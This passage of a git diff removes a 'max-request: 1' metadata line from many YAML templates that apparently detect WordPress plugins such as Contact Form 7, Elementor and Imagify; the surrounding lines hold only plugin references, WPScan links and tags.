     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
